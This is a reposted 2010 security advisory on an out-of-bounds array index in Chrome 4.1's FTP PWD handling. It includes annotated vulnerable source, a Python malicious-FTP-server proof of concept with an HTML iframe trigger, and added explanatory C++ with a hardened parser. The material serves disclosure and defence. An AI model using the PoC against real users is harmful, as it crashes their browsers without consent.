Google Chrome 4.1.249.1042 Array Indexing Bug

Posted 03 Apr 2010. Reported by Tobias Klein. Source: packetstorm (packetstormsecurity.com)

Google Chrome 4.1.249.1042 OOB Array Indexing Bug Remote Crash

source: http://www.trapkit.de/advisories/TKADV2010-004.txt  
  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Advisory: Google Chrome OOB Array Indexing Bug   
Advisory ID: TKADV2010-004  
Revision: 1.0  
Release Date: 2010/03/31  
Last Modified: 2010/03/31  
Date Reported: 2010/03/21  
Author: Tobias Klein (tk at trapkit.de)  
Affected Software: Google Chrome <= 4.1.249.1042 (Build 42199)  
Remotely Exploitable: Yes  
Locally Exploitable: No  
Vendor URL: http://www.google.com/chrome/  
Vendor Status: Vendor has released an updated version  
  
  
======================  
Vulnerability Details:  
======================  
  
Google Chrome is vulnerable to an out-of-bounds array indexing bug in its  
handling of FTP PWD server responses: the directory name extracted from the  
reply is indexed without first checking that it is non-empty. By persuading  
a victim to visit a specially crafted web site containing an iframe pointing  
to a malicious FTP server, a remote attacker can trigger the bug and crash  
the browser. No user interaction beyond loading the page is required.  
  
This bug affects the trusted browser kernel (the privileged process that  
supervises the sandboxed renderer processes), where the FTP client code runs,  
so the crash is not contained by the renderer sandbox. The impact is a denial  
of service (browser crash).  
  
Tested Chrome version (Microsoft Windows):  
  
Google Chrome 4.1.249.1042 (Build 42199)  
WebKit 532.5  
V8 1.3.18.22  
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1042 Safari/532.5  
  
  
==================  
Technical Details:  
==================  
  
File: net\ftp\ftp_network_transaction.cc  
  
```cpp
[..]
int FtpNetworkTransaction::ProcessResponsePWD(const FtpCtrlResponse& response) {
  switch (GetErrorClass(response.status_code)) {
    case ERROR_CLASS_INITIATED:
      return Stop(ERR_INVALID_RESPONSE);
    case ERROR_CLASS_OK: {
      // The info we look for should be on the first line.
[1]   std::string line = response.lines[0];
      if (line.empty())
        return Stop(ERR_INVALID_RESPONSE);
[2]   std::string::size_type quote_pos = line.find('"');
      if (quote_pos != std::string::npos) {
[3]     line = line.substr(quote_pos + 1);
[4]     quote_pos = line.find('"');
        if (quote_pos == std::string::npos)
          return Stop(ERR_INVALID_RESPONSE);
[5]     line = line.substr(0, quote_pos);
      }
      if (system_type_ == SYSTEM_TYPE_VMS)
        line = FtpUtil::VMSPathToUnix(line);
[6]   if (line[line.length() - 1] == '/')
        line.erase(line.length() - 1);
      current_remote_directory_ = line;
      next_state_ = STATE_CTRL_WRITE_TYPE;
      break;
    }
    case ERROR_CLASS_INFO_NEEDED:
      return Stop(ERR_INVALID_RESPONSE);
    case ERROR_CLASS_TRANSIENT_ERROR:
      return Stop(ERR_FAILED);
    case ERROR_CLASS_PERMANENT_ERROR:
      return Stop(ERR_FAILED);
    default:
      NOTREACHED();
      return Stop(ERR_UNEXPECTED);
  }
  return OK;
}
[..]
```
  
[1] 'line' holds the first line of the FTP server's PWD reply; it is rejected  
only if that raw line is empty.  
[2] Search for the first double quote (") in the line.  
[3] Drop everything up to and including the first double quote.  
[4] Find the next double quote.  
[5] Keep only the text up to the second double quote, i.e. the quoted  
directory name.  
[6] Test whether the last character of the extracted name is a '/'.  
  
If the server's reply contains two double quotes directly after each other  
(a reply of `257 ""`), the substring produced at [5] has a length of zero.  
The emptiness check at [1] ran on the raw line, before the quotes were  
stripped, so nothing rejects the empty name, and at [6] line.length() - 1  
wraps around to the largest size_t value. The resulting out-of-bounds index  
(line[0xffffffff] on the 32-bit Windows build tested) crashes the browser  
process. The impact is a denial of service, not code execution.  
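To make the failure concrete, the following added example (written for this page; it is neither Chromium's code nor part of the original advisory) reimplements steps [1]..[5] on the text of a PWD reply, computes the index that the unchecked expression at [6] would use, and shows a hardened variant that re-checks for an empty directory name after the quotes are stripped. Two assumptions are labelled in the code: the input is the reply text after the `257 ` code, and the hardened version is the kind of check the advisory's description calls for, not the exact Chromium patch.

```cpp
#include <cstddef>
#include <string>

// Outcome of handling one PWD reply body: continue, or the equivalent of
// Stop(ERR_INVALID_RESPONSE) in the advisory's ProcessResponsePWD.
enum class PwdResult { kOk, kInvalidResponse };

struct PwdParse {
  PwdResult result;
  std::string path;  // meaningful only when result == kOk
};

// Steps [1]..[5] of the advisory's code. Assumption: `line` is the text
// after the "257 " code, i.e. what response.lines[0] holds. A line with no
// double quote is used as-is; a line with a single quote is rejected; for
// `257 ""` the text between the first two quotes is empty.
PwdParse ExtractQuotedPath(std::string line) {
  if (line.empty())
    return {PwdResult::kInvalidResponse, ""};       // [1]: raw line only
  std::string::size_type quote_pos = line.find('"');  // [2]
  if (quote_pos != std::string::npos) {
    line = line.substr(quote_pos + 1);                // [3]
    quote_pos = line.find('"');                       // [4]
    if (quote_pos == std::string::npos)
      return {PwdResult::kInvalidResponse, ""};
    line = line.substr(0, quote_pos);                 // [5]: may now be ""
  }
  return {PwdResult::kOk, line};
}

// The index that the unchecked expression at [6], line[line.length() - 1],
// evaluates to. Computing it is well defined (size_t arithmetic wraps);
// dereferencing it is not. For an empty path it is the maximum size_t,
// which is 0xffffffff on the 32-bit Windows build the advisory tested.
std::size_t TrailingSlashIndex(const std::string& path) {
  return path.length() - 1;
}

// Hardened handling (added here, not the Chromium patch): reject an empty
// directory name after quote extraction, before reading any character.
PwdParse ParsePwdHardened(const std::string& line) {
  PwdParse p = ExtractQuotedPath(line);
  if (p.result != PwdResult::kOk)
    return p;
  if (p.path.empty())
    return {PwdResult::kInvalidResponse, ""};        // the missing re-check
  if (p.path.back() == '/')                           // safe: non-empty
    p.path.pop_back();
  return p;
}
```

`ExtractQuotedPath("\"\"")` returns kOk with an empty path, which is exactly the state the vulnerable code reaches before [6]; `ParsePwdHardened` rejects it, while a normal reply such as `"/pub/" is current directory.` still yields `/pub`.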
  
  
=================  
Proof of Concept:  
=================  
  
Malicious FTP server:  
  
K:\BUGS\CHROME>type poc.py  

```python
from socket import AF_INET, SOCK_STREAM, socket
from time import sleep

host = "0.0.0.0"
port = 21

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print("\n[+] Google Chrome (4.1.249.1042) Denial of Service poc")
print("[+] Listening on port %d ..." % port)

cl, addr = s.accept()
print("[+] Connection accepted from %s" % addr[0])

# Greeting; Chrome answers with USER anonymous.
cl.send(b"220 Google Chrome (4.1.249.1042) Denial of Service poc\r\n")

cl.recv(128)
# Ask for a password; Chrome answers with PASS.
cl.send(b"331 Password required for anonymous.\r\n")

cl.recv(128)
# Login accepted; Chrome sends SYST next.
cl.send(b"230 User anonymous logged in.\r\n")

cl.recv(128)
# A UNIX system type keeps Chrome out of the VMS path-conversion branch.
cl.send(b"215 UNIX Type: bib\r\n")

cl.recv(128)
# PWD reply whose quoted directory name is empty: this is the trigger.
cl.send(b'257 ""\r\n')

print("[+] Sending buffer: OK\n")

sleep(1)
cl.close()
s.close()
```
  
Start the poc server:  
  
K:\BUGS\CHROME>python poc.py  
  
[+] Google Chrome (4.1.249.1042) Denial of Service poc  
[+] Listening on port 21 ...  
  
  
Open the following sample HTML page in Chrome:  
  
```html
<html>
<body>
<iframe name="POC" src="ftp://127.0.0.1"></iframe>
</body>
</html>
```
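The five replies poc.py sends form a complete control-channel conversation as Chrome's FTP client sees it. The following added example (written for this page; not Chromium's code and not from the advisory) shows the step that precedes ProcessResponsePWD: framing the raw control stream into (status code, text lines) replies, including the RFC 959 multi-line form `NNN-...` terminated by `NNN ...`, and classifying each code by its first digit the way the ERROR_CLASS_* cases in the advisory's switch do. The transcript constant is the PoC's reply script reconstructed by hand (a constructed sample, not a capture); the assumption that the text after the code and its separator is what lands in lines[0] is mine.

```cpp
#include <cctype>
#include <cstdlib>
#include <string>
#include <vector>

// One parsed control-channel reply: a 3-digit code plus its text line(s),
// the same shape as the FtpCtrlResponse that ProcessResponsePWD receives.
struct CtrlReply {
  int status_code = 0;
  std::vector<std::string> lines;
};

// RFC 959 reply classes keyed on the first digit, mirroring the
// ERROR_CLASS_* cases switched on in the advisory's code.
enum class ErrorClass { kInitiated, kOk, kInfoNeeded, kTransient, kPermanent, kUnknown };

ErrorClass ClassOf(int code) {
  switch (code / 100) {
    case 1: return ErrorClass::kInitiated;   // 1yz positive preliminary
    case 2: return ErrorClass::kOk;          // 2yz positive completion
    case 3: return ErrorClass::kInfoNeeded;  // 3yz positive intermediate
    case 4: return ErrorClass::kTransient;   // 4yz transient negative
    case 5: return ErrorClass::kPermanent;   // 5yz permanent negative
    default: return ErrorClass::kUnknown;
  }
}

// The reply script of poc.py, reconstructed by hand (constructed sample,
// not a capture). Each reply is CRLF-terminated as on the wire.
const char kPocTranscript[] =
    "220 Google Chrome (4.1.249.1042) Denial of Service poc\r\n"
    "331 Password required for anonymous.\r\n"
    "230 User anonymous logged in.\r\n"
    "215 UNIX Type: bib\r\n"
    "257 \"\"\r\n";

static bool StartsWithCode(const std::string& line) {
  return line.size() >= 3 &&
         std::isdigit(static_cast<unsigned char>(line[0])) &&
         std::isdigit(static_cast<unsigned char>(line[1])) &&
         std::isdigit(static_cast<unsigned char>(line[2]));
}

// Split a raw control stream into replies. "NNN-text" opens a multi-line
// reply that runs until a line "NNN text" with the same code; lines in
// between are kept verbatim as continuation text. Text before the first
// code line is dropped (assumption: treated as noise).
std::vector<CtrlReply> ParseControlStream(const std::string& raw) {
  std::vector<CtrlReply> replies;
  CtrlReply cur;
  bool in_multiline = false;
  std::string::size_type pos = 0;
  while (pos < raw.size()) {
    std::string::size_type eol = raw.find("\r\n", pos);
    std::string line = raw.substr(pos, eol == std::string::npos ? std::string::npos : eol - pos);
    pos = (eol == std::string::npos) ? raw.size() : eol + 2;

    // Text after the code and its separator; empty for a bare "NNN" line.
    // For the PoC's last reply this is the two characters "" (assumption:
    // this is what response.lines[0] holds in Chromium).
    std::string text = line.size() > 4 ? line.substr(4) : std::string();

    if (!in_multiline) {
      if (!StartsWithCode(line))
        continue;
      cur = CtrlReply();
      cur.status_code = std::atoi(line.substr(0, 3).c_str());
      cur.lines.push_back(text);
      if (line.size() > 3 && line[3] == '-')
        in_multiline = true;
      else
        replies.push_back(cur);
    } else if (StartsWithCode(line) && line.size() > 3 && line[3] == ' ' &&
               std::atoi(line.substr(0, 3).c_str()) == cur.status_code) {
      cur.lines.push_back(text);   // terminating line of the multi-line reply
      replies.push_back(cur);
      in_multiline = false;
    } else {
      cur.lines.push_back(line);   // continuation line, kept as-is
    }
  }
  return replies;
}
```

Run over kPocTranscript this yields five replies; the last has code 257, class kOk, and a single line whose text is the two characters `""`, which is the value that reaches the quote-stripping at [2]..[5] in the advisory's code. Everything in that line is chosen by the server, so a client must treat it as hostile input.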
  
  
=========   
Solution:   
=========  
  
Update to Google Chrome >= 4.1.249.1045.  
  
  
====================   
Disclosure Timeline:   
====================  
  
Format: year/month/day  
  
2010/03/21 - Chromium maintainers notified  
2010/03/22 - Patch developed by Chromium maintainers  
2010/03/30 - Fixed version of Google Chrome is available  
2010/03/31 - Release date of this security advisory  
  
  
========   
Credits:   
========  
  
Vulnerability found and advisory written by Tobias Klein.  
  
  
===========   
References:   
===========  
  
[REF1] http://googlechromereleases.blogspot.com/2010/03/stable-update-disable-translate.html  
[REF2] http://bugs.chromium.org/38845  
[REF3] http://www.trapkit.de/advisories/TKADV2010-004.txt  
  
  
========   
Changes:   
========  
  
Revision 0.1 - Initial draft release to the vendor  
Revision 1.0 - Public release  
  
  
===========  
Disclaimer:  
===========  
  
The information within this advisory may change without notice. Use  
of this information constitutes acceptance for use in an AS IS  
condition. There are no warranties, implied or express, with regard  
to this information. In no event shall the author be liable for any  
direct or indirect damages whatsoever arising out of or in connection  
with the use or spread of this information. Any use of this  
information is at the user's own risk.  
  
  
==================   
PGP Signature Key:   
==================  
  
http://www.trapkit.de/advisories/tk-advisories-signature-key.asc  
  
  
Copyright 2010 Tobias Klein. All rights reserved.  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP  
Charset: utf-8  
  
wj8DBQFLs6gPkXxgcAIbhEERAlH6AKD+UgqYNZpBD40+o7Yl8HjdsaVM1QCffMKa  
pqw8f2DGxim/+N1k+jCqbcQ=  
=mHHh  
-----END PGP SIGNATURE-----  
  
  
